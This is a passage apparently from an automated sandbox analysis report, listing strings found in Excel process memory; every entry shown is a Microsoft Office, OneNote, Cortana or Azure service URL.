    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlS
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://cdn.entity.
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.pngb
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiesPA
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ios$
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyY
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenot
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxxcel
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://config.edge.skype.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://cortana.ai
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://cortana.ai/api
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/api6R
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apimP
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://cr.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filteri
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filterin
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/01w#r
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comZ6
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.coms
    Source: EXCEL.EXE, 00000000.00000002.890876333.000000000F04A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.883987348.000000000F04A000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comsF
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comv1
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: EXCEL.EXE, 00000000.00000003.886777614.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892135449.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285010208.0000000012920000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesz
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://dev.cortana.ai
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://devnull.onenote.com
    Source: EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_S
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comt
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://directory.services.
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/Jj
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1_
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml&
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/Ok
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/Tk
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comr
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learn
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmpString found in binary or memory: https://europe-api.-
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmpString found in binary or memory: https://europe-api.-w
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://europe-api.fp.wd.mi
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://excel.2
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: EXCEL.EXE, 00000000.00000002.891599493.00000000126FA000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidI
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/yE
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://graph.windows.net
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://graph.windows.net/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/erE
